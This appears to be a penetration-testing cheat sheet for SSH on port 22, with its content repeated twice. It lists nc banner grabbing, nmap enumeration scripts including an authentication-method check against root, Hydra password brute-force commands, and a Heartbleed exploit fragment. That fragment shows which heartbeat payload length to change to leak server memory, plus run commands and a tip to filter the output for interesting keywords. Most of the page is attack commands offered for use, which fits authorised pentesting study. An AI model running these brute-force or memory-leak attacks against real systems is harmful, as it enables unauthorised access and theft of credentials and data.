SSH (22)

1. Scanning

Banner Grabbing - nc -vn <IP> 22
Initiate Connection - ssh <username>@<IP> [-p <port>]

Identify public SSH key of server - ssh-keyscan -t rsa <IP> [-p <port>]

dnsrecon -d <domain_name> -n <IP>
dnsenum <domain_name>
ssh-audit -v <IP>

2. Enumeration

Default nmap scripts for SSH - nmap -sC -p<port> <IP>
Retrieve version - nmap -sV -p<port> <IP>

Retrieve supported algorythms - 
    nmap --script ssh2-enum-algos -p<port> <IP>
Retrieve weak keys - 
    nmap --script ssh-hostkey --script-args ssh_hostkey=full -p<port> <IP>
Check authentication methods - 
    nmap --script ssh-auth-methods --script-args="ssh.user=root" -p<port> <IP>

3. Hydra

    hydra -l <username> -p <password> -s <port number> ssh://<target ip address>
    hydra -l <username> -P <wordlist> -s <port number> ssh://<target ip address>
    
    hydra -L <username list> -P <wordlist> -s <port number> ssh://<target ip address>
    hydra -L <username list> -p <password> -s <port number> ssh://<target ip address>

4. HeartBleed.py

Areas to modify

def build_heartbeat(tls_ver):
    heartbeat = [
0x18,       # Content Type (Heartbeat)
0x03, tls_ver,  # TLS version
0x00, 0x03,  # Length
# Payload
0x01,       # Type (Request)
0x40, 0x00  # Payload length // Modify this
    ] 
    return heartbeat

def build_heartbeat(tls_ver):
    heartbeat = [
0x18,       # Content Type (Heartbeat)
0x03, tls_ver,  # TLS version
0x00, 0x03,  # Length
# Payload
0x01,       # Type (Request)
0x10, 0x00  # Payload length // Modify this
    ] 
    return heartbeat

To run

Default Execution - python heartbleed.py <IP>
Include Hexdump in output - python heartbleed.py -x <IP>

Repeated run - python heartbleed.py -n <count> <IP>
    # Filter output for interesting keywords
    # Remember to enumerate other services while this runs

PreviousDNS (53)NextLDAP (389/636/3268)

Last updated 3 months ago

SSH (22)

1. Scanning

Banner Grabbing - nc -vn <IP> 22
Initiate Connection - ssh <username>@<IP> [-p <port>]

Identify public SSH key of server - ssh-keyscan -t rsa <IP> [-p <port>]

dnsrecon -d <domain_name> -n <IP>
dnsenum <domain_name>
ssh-audit -v <IP>

2. Enumeration

Default nmap scripts for SSH - nmap -sC -p<port> <IP>
Retrieve version - nmap -sV -p<port> <IP>

Retrieve supported algorythms - 
    nmap --script ssh2-enum-algos -p<port> <IP>
Retrieve weak keys - 
    nmap --script ssh-hostkey --script-args ssh_hostkey=full -p<port> <IP>
Check authentication methods - 
    nmap --script ssh-auth-methods --script-args="ssh.user=root" -p<port> <IP>

3. Hydra

    hydra -l <username> -p <password> -s <port number> ssh://<target ip address>
    hydra -l <username> -P <wordlist> -s <port number> ssh://<target ip address>
    
    hydra -L <username list> -P <wordlist> -s <port number> ssh://<target ip address>
    hydra -L <username list> -p <password> -s <port number> ssh://<target ip address>

4. HeartBleed.py

Download script via:

Areas to modify

def build_heartbeat(tls_ver):
    heartbeat = [
0x18,       # Content Type (Heartbeat)
0x03, tls_ver,  # TLS version
0x00, 0x03,  # Length
# Payload
0x01,       # Type (Request)
0x40, 0x00  # Payload length // Modify this
    ] 
    return heartbeat

def build_heartbeat(tls_ver):
    heartbeat = [
0x18,       # Content Type (Heartbeat)
0x03, tls_ver,  # TLS version
0x00, 0x03,  # Length
# Payload
0x01,       # Type (Request)
0x10, 0x00  # Payload length // Modify this
    ] 
    return heartbeat

To run

Default Execution - python heartbleed.py <IP>
Include Hexdump in output - python heartbleed.py -x <IP>

Repeated run - python heartbleed.py -n <count> <IP>
    # Filter output for interesting keywords
    # Remember to enumerate other services while this runs

PreviousDNS (53)NextLDAP (389/636/3268)

Last updated 3 months ago